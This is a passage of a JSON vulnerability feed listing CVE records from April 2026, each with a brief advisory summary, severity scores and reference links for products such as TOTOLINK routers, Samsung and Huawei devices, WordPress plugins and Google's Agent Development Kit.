The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.","cvss":5.1,"cvss_version":4.0,"cvss_v2":4.0,"cvss_v3":3.5,"cvss_v4":5.1,"epss":0.00033,"ranking_epss":0.09303,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/","https://github.com/1Panel-dev/MaxKB/commit/7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8","https://github.com/1Panel-dev/MaxKB/pull/4578","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.5.0","https://github.com/AnalogyC0de/public_exp/issues/28","https://vuldb.com/submit/782265","https://vuldb.com/vuln/356967","https://vuldb.com/vuln/356967/cti"],"published_time":"2026-04-13T10:16:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4810","summary":"A Code Injection and Missing Authentication vulnerability in Google Agent Development Kit (ADK) versions 1.7.0 (and 2.0.0a1) through 1.28.1 (and 2.0.0a2) on Python (OSS), Cloud Run, and GKE allows an unauthenticated remote attacker to execute arbitrary code on the server hosting the ADK instance.\n\nThis vulnerability was patched in versions 1.28.1 and 2.0.0a2.\n\n\nCustomers need to redeploy the upgraded ADK to their production environments. 
In addition, if they are running ADK Web locally, they also need to upgrade their local instance.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.3,"epss":0.00295,"ranking_epss":0.52835,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/google/adk-python/blob/main/CHANGELOG.md#1274-2026-03-26"],"published_time":"2026-04-13T09:16:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0233","summary":"A certificate validation vulnerability in Palo Alto Networks Autonomous Digital Experience Manager on Windows allows an unauthenticated attacker with adjacent network access to execute arbitrary code with NT AUTHORITY\\SYSTEM  privileges.","cvss":2.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.0,"epss":0.0001,"ranking_epss":0.01123,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.paloaltonetworks.com/CVE-2026-0233"],"published_time":"2026-04-13T08:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0234","summary":"An improper verification of cryptographic signature vulnerability exists in Cortex XSOAR and Cortex XSIAM platforms during integration of Microsoft Teams that enables an unauthenticated user to access and modify protected resources.","cvss":7.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.2,"epss":0.00027,"ranking_epss":0.07353,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.paloaltonetworks.com/CVE-2026-0234"],"published_time":"2026-04-13T08:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0232","summary":"A problem with a protection mechanism in the Palo Alto Networks Cortex XDR agent on Windows allows a local Windows administrator to disable the agent. 
This issue may be leveraged by malware to perform malicious activity without detection.","cvss":4.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":4.0,"epss":0.00013,"ranking_epss":0.02124,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.paloaltonetworks.com/CVE-2026-0232"],"published_time":"2026-04-13T08:16:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6167","summary":"A vulnerability was detected in code-projects Faculty Management System 1.0. Impacted is an unknown function of the file /subject-print.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit is now public and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/wfcht-sy/src/issues/1","https://vuldb.com/submit/797098","https://vuldb.com/vuln/357055","https://vuldb.com/vuln/357055/cti"],"published_time":"2026-04-13T07:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6168","summary":"A flaw has been found in TOTOLINK A7000R up to 9.1.0u.6115. The affected element is the function setWiFiEasyGuestCfg of the file /cgi-bin/cstecgi.cgi. This manipulation of the argument ssid5g causes stack-based buffer overflow. Remote exploitation of the attack is possible. 
The exploit has been published and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00077,"ranking_epss":0.22868,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/zhuchan770/vulnerability/blob/main/A7000R/setWiFiEasyGuestCfg/ToToLink%20A7000R%20setWiFiEasyGuestCfg%20338996b67c9780b89829d0ea70058788.md","https://vuldb.com/submit/797193","https://vuldb.com/vuln/357056","https://vuldb.com/vuln/357056/cti","https://www.totolink.net/"],"published_time":"2026-04-13T07:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34866","summary":"Out-of-bounds write vulnerability in the WEB module.Impact: Successful exploitation of this vulnerability will affect availability and confidentiality.","cvss":5.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.1,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00412,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T07:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3830","summary":"The Product Filter for WooCommerce by WBW WordPress plugin before 3.1.3 does not sanitize and escape a parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.00064,"ranking_epss":0.1989,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://wpscan.com/vulnerability/768014fd-0403-4182-b19e-3d46c92d8755/"],"published_time":"2026-04-13T07:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40436","summary":"The ZTE ZXEDM iEMS product has a password reset vulnerability for any user.Because the management of the cloud EMS portal does not properly control access to the user list acquisition function, attackers can read all user list 
information through the user list interface. Attackers can reset the passwords of obtained user information, causing risks such as unauthorized operations.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11518,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://support.zte.com.cn/zte-iccp-isupport-webui/support/bulletin/security?lang=en_US&t=0.7465962531829456"],"published_time":"2026-04-13T07:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5085","summary":"Solstice::Session versions through 1440 for Perl generates session ids insecurely.\n\nThe _generateSessionID method returns an MD5 digest seeded by the epoch time, a random hash reference, a call to the built-in rand() function and the process id.\n\nThe same method is used in the _generateID method in Solstice::Subsession, which is part of the same distribution.\n\nThe epoch time may be guessed, if it is not leaked in the HTTP Date header. Stringified hash references will contain predictable content. The built-in rand() function is seeded by 16-bits and is unsuitable for security purposes. 
The process id comes from a small set of numbers.\n\nPredictable session ids could allow an attacker to gain access to systems.","cvss":9.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.1,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08581,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://metacpan.org/dist/Solstice/source/lib/Solstice/Session.pm#L481","https://metacpan.org/dist/Solstice/source/lib/Solstice/Subsession.pm#L105","https://security.metacpan.org/docs/guides/random-data-for-security.html","http://www.openwall.com/lists/oss-security/2026/04/13/2"],"published_time":"2026-04-13T07:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5936","summary":"An attacker can control a server-side HTTP request by supplying a crafted URL, causing the server to initiate requests to arbitrary destinations. This behavior may be exploited to probe internal network services, access otherwise unreachable endpoints (e.g., cloud metadata services), or bypass network access controls, potentially leading to sensitive information disclosure and further compromise of the internal environment.","cvss":8.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.5,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07905,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.foxit.com/support/security-bulletins.html"],"published_time":"2026-04-13T07:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6166","summary":"A security vulnerability has been detected in code-projects Vehicle Showroom Management System 1.0. This issue affects some unknown processing of the file /util/UpdateVehicleFunction.php. The manipulation of the argument VEHICLE_ID leads to sql injection. The attack may be initiated remotely. 
The exploit has been disclosed publicly and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/wfcht-sy/src/issues/2","https://vuldb.com/submit/797097","https://vuldb.com/vuln/357054","https://vuldb.com/vuln/357054/cti"],"published_time":"2026-04-13T07:16:50","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34865","summary":"Out-of-bounds write vulnerability in the WEB module.Impact: Successful exploitation of this vulnerability will affect availability and confidentiality.","cvss":10.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":10.0,"epss":0.0002,"ranking_epss":0.05266,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T07:16:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-15441","summary":"The Form Maker by 10Web  WordPress plugin before 1.15.38 does not properly prepare SQL queries when the \"MySQL Mapping\" feature is in use, which could make SQL Injection attacks possible in certain contexts.","cvss":6.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.8,"cvss_v4":null,"epss":0.00035,"ranking_epss":0.10303,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://wpscan.com/vulnerability/41f69b0a-4d17-4a6b-b803-ea1c370e3cc0/"],"published_time":"2026-04-13T07:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6164","summary":"A security flaw has been discovered in code-projects Lost and Found Thing Management 1.0. This affects an unknown part of the file /addcat.php. Performing a manipulation of the argument cata results in sql injection. The attack can be initiated remotely. 
The exploit has been released to the public and may be used for attacks.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/lanPwa/CVE/issues/1","https://vuldb.com/submit/797089","https://vuldb.com/vuln/357052","https://vuldb.com/vuln/357052/cti"],"published_time":"2026-04-13T06:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6165","summary":"A weakness has been identified in code-projects Vehicle Showroom Management System 1.0. This vulnerability affects unknown code of the file /util/Login_check.php. Executing a manipulation of the argument ID can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/realnotjoking/cve/issues/2","https://vuldb.com/submit/797090","https://vuldb.com/vuln/357053","https://vuldb.com/vuln/357053/cti"],"published_time":"2026-04-13T06:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21013","summary":"Incorrect default permission in Galaxy Wearable prior to version 2.2.68.26 allows local attackers to access sensitive information.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00014,"ranking_epss":0.0248,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21014","summary":"Improper access control in Samsung Camera prior to version 16.5.00.28 allows a local attacker to 
access location data. User interaction is required for triggering this vulnerability.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":0.00013,"ranking_epss":0.02107,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40447","summary":"Integer overflow or wraparound vulnerability in Samsung Open Source Escargot allows undefined behavior.This issue affects Escargot: 97e8115ab1110bc502b4b5e4a0c689a71520d335.","cvss":5.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.1,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02086,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6163","summary":"A vulnerability was identified in code-projects Lost and Found Thing Management 1.0. Affected by this issue is some unknown functionality of the file /catageory.php. Such manipulation of the argument cat leads to sql injection. It is possible to launch the attack remotely. 
The exploit is publicly available and might be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/lanPwa/CVE/issues/2","https://vuldb.com/submit/797088","https://vuldb.com/vuln/357051","https://vuldb.com/vuln/357051/cti"],"published_time":"2026-04-13T06:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21006","summary":"Improper access control in Samsung DeX prior to SMR Apr-2026 Release 1 allows physical attackers to access hidden notification contents.","cvss":4.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":2.4,"cvss_v4":4.7,"epss":0.0002,"ranking_epss":0.05337,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":"samsung","product":"android","version":null},{"cve_id":"CVE-2026-21007","summary":"Improper check for exceptional conditions in Device Care prior to SMR Apr-2026 Release 1 allows physical attackers to bypass Knox Guard.","cvss":4.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.8,"cvss_v4":4.4,"epss":0.00022,"ranking_epss":0.05899,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":"samsung","product":"android","version":null},{"cve_id":"CVE-2026-21008","summary":"Exposure of sensitive information in S Share prior to SMR Apr-2026 Release 1 allows an adjacent attacker to access sensitive 
information.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":5.1,"epss":0.00014,"ranking_epss":0.02433,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":"samsung","product":"android","version":null},{"cve_id":"CVE-2026-21009","summary":"Improper check for exceptional conditions in Recents prior to SMR Apr-2026 Release 1 allows physical attacker to bypass App Pinning.","cvss":4.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":4.1,"epss":0.00022,"ranking_epss":0.05829,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21010","summary":"Improper input validation in Retail Mode prior to SMR Apr-2026 Release 1 allows local attackers to trigger privileged functions.","cvss":6.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.6,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05164,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":"samsung","product":"android","version":null},{"cve_id":"CVE-2026-21011","summary":"Incorrect privilege assignment in Bluetooth in Maintenance mode prior to SMR Apr-2026 Release 1 allows physical attackers to bypass Extend 
Unlock.","cvss":5.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.8,"cvss_v4":5.4,"epss":0.00021,"ranking_epss":0.05721,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":"samsung","product":"android","version":null},{"cve_id":"CVE-2026-21012","summary":"External control of file name in AODManager prior to SMR Apr-2026 Release 1 allows privileged local attacker to create file with system privilege.","cvss":6.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":3.3,"cvss_v4":6.8,"epss":0.00014,"ranking_epss":0.02307,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T06:16:05","vendor":"samsung","product":"android","version":null},{"cve_id":"CVE-2026-6158","summary":"A flaw has been found in Totolink N300RH 6.1c.1353_B20190305. Affected is the function setUpgradeUboot of the file upgrade.so. This manipulation of the argument FileName causes os command injection. The attack is possible to be carried out remotely. The exploit has been published and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.02365,"ranking_epss":0.84948,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/xyh4ck/iot_poc/tree/main/TOTOLINK/N300RHv4/02_setUpgradeUboot_RCE","https://vuldb.com/submit/796426","https://vuldb.com/vuln/357038","https://vuldb.com/vuln/357038/cti","https://www.totolink.net/"],"published_time":"2026-04-13T05:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6159","summary":"A vulnerability has been found in code-projects Simple ChatBox up to 1.0. Affected by this vulnerability is an unknown functionality of the file /chatbox/insert.php of the component Endpoint. 
Such manipulation of the argument msg leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed to the public and may be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00033,"ranking_epss":0.09343,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/ahmadmarz10-hub/CVEsMarz/blob/main/Stored%20Cross-Site%20Scripting%20(XSS)%20in%20Simple%20Chatbox%20PHP%20msg%20Parameter.md","https://vuldb.com/submit/796666","https://vuldb.com/vuln/357039","https://vuldb.com/vuln/357039/cti"],"published_time":"2026-04-13T05:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6160","summary":"A vulnerability was found in code-projects Simple ChatBox 1.0. Affected by this issue is the function SimpleChatbox_PHP of the file chatbox.sql of the component Endpoint. Performing a manipulation results in file and directory information exposure. It is possible to initiate the attack remotely. The exploit has been made public and could be used.","cvss":5.5,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":5.3,"cvss_v4":5.5,"epss":0.00031,"ranking_epss":0.0876,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/ahmadmarz10-hub/CVEsMarz/blob/main/Sensitive%20Information%20Disclosure%20in%20Simple%20Chatbox%20PHP%20Exposed%20Database%20Backup.md","https://vuldb.com/submit/796696","https://vuldb.com/vuln/357040","https://vuldb.com/vuln/357040/cti"],"published_time":"2026-04-13T05:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6161","summary":"A vulnerability was determined in code-projects Simple ChatBox up to 1.0. This affects an unknown part of the file /chatbox/insert.php of the component Endpoint. Executing a manipulation of the argument msg can lead to sql injection. It is possible to launch the attack remotely. 
The exploit has been publicly disclosed and may be utilized.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/ahmadmarz10-hub/CVEsMarz/blob/main/SQL%20Injection%20in%20Simple%20Chatbox%20PHP%20msg%20Parameter.md","https://vuldb.com/submit/796697","https://vuldb.com/vuln/357041","https://vuldb.com/vuln/357041/cti"],"published_time":"2026-04-13T05:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6162","summary":"A vulnerability has been found in PHPGurukul Company Visitor Management System 2.0. This impacts an unknown function of the file /bwdates-reports-details.php. The manipulation of the argument fromdate leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used.","cvss":5.1,"cvss_version":4.0,"cvss_v2":4.0,"cvss_v3":3.5,"cvss_v4":5.1,"epss":0.00031,"ranking_epss":0.08675,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/f1rstb100d/CVE/issues/44","https://phpgurukul.com/","https://vuldb.com/submit/797171","https://vuldb.com/vuln/357048","https://vuldb.com/vuln/357048/cti"],"published_time":"2026-04-13T05:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34862","summary":"Race condition vulnerability in the power consumption statistics module.\nImpact: Successful exploitation of this vulnerability may affect 
availability.","cvss":6.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.3,"cvss_v4":null,"epss":5e-05,"ranking_epss":0.00241,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T05:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34863","summary":"Out-of-bounds write vulnerability in the file system.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00328,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/"],"published_time":"2026-04-13T05:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34864","summary":"Boundary-unlimited vulnerability in the application read module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":6.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.8,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00396,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T05:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35553","summary":"Bluetooth ACPI Drivers provided by Dynabook Inc. contain a stack-based buffer overflow vulnerability. 
An attacker may execute arbitrary code by modifying certain registry values.","cvss":8.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":8.4,"epss":0.00012,"ranking_epss":0.01665,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://corporate.jp.sharp/info/product-security/advisory-list/2026-001/","https://global.sharp/corporate/info/product-security/advisory-list/2026-001/","https://jvn.jp/en/vu/JVNVU96334293/"],"published_time":"2026-04-13T05:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40446","summary":"Access of resource using incompatible type ('type confusion') vulnerability in Samsung Open Source Escargot allows Pointer Manipulation.This issue affects Escargot: 97e8115ab1110bc502b4b5e4a0c689a71520d335.","cvss":6.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.9,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01846,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T05:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34849","summary":"UAF vulnerability in the screen management module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":2.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.5,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00326,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":"huawei","product":"harmonyos","version":null},{"cve_id":"CVE-2026-34854","summary":"UAF vulnerability in the kernel module.\nImpact: Successful exploitation of this vulnerability will affect availability and 
confidentiality.","cvss":5.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00328,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34855","summary":"Out-of-bounds write vulnerability in the kernel module.\nImpact: Successful exploitation of this vulnerability will affect availability and confidentiality.","cvss":5.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":null,"epss":8e-05,"ranking_epss":0.00783,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34857","summary":"UAF vulnerability in the communication module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":4.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.7,"cvss_v4":null,"epss":5e-05,"ranking_epss":0.0022,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinvision/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34858","summary":"UAF vulnerability in the communication module.\nImpact: Successful exploitation of this vulnerability may affect 
availability.","cvss":4.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.1,"cvss_v4":null,"epss":5e-05,"ranking_epss":0.0022,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinvision/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34859","summary":"UAF vulnerability in the kernel module.\nImpact: Successful exploitation of this vulnerability will affect availability and confidentiality.","cvss":5.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.9,"cvss_v4":null,"epss":6e-05,"ranking_epss":0.00369,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinvision/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34861","summary":"Race condition vulnerability in the thermal management module.\nImpact: Successful exploitation of this vulnerability may affect availability.","cvss":6.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.3,"cvss_v4":null,"epss":5e-05,"ranking_epss":0.00241,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://consumer.huawei.com/en/support/bulletin/2026/4/","https://consumer.huawei.com/en/support/bulletinwearables/2026/4/"],"published_time":"2026-04-13T05:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-21003","summary":"Improper input validation in data related to network restrictions prior to SMR Apr-2026 Release 1 allows physical attackers to bypass the 
restrictions.","cvss":5.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.2,"epss":0.00044,"ranking_epss":0.13271,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04"],"published_time":"2026-04-13T05:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25205","summary":"Heap-based buffer overflow vulnerability in Samsung Open Source Escargot allows out-of-bounds write.This issue affects Escargot:commit hash \n97e8115ab1110bc502b4b5e4a0c689a71520d335\n\n.","cvss":7.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.4,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02102,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T05:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25206","summary":"Out-of-bounds read vulnerability in Samsung Open Source Escargot allows Resource Leak Exposure.This issue affects Escargot: 97e8115ab1110bc502b4b5e4a0c689a71520d335.","cvss":6.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.7,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02102,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Samsung/escargot/pull/1554"],"published_time":"2026-04-13T05:16:02","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25207","summary":"Out-of-bounds write vulnerability in Samsung Open Source Escargot allows Overflow Buffers.This issue affects Escargot: 
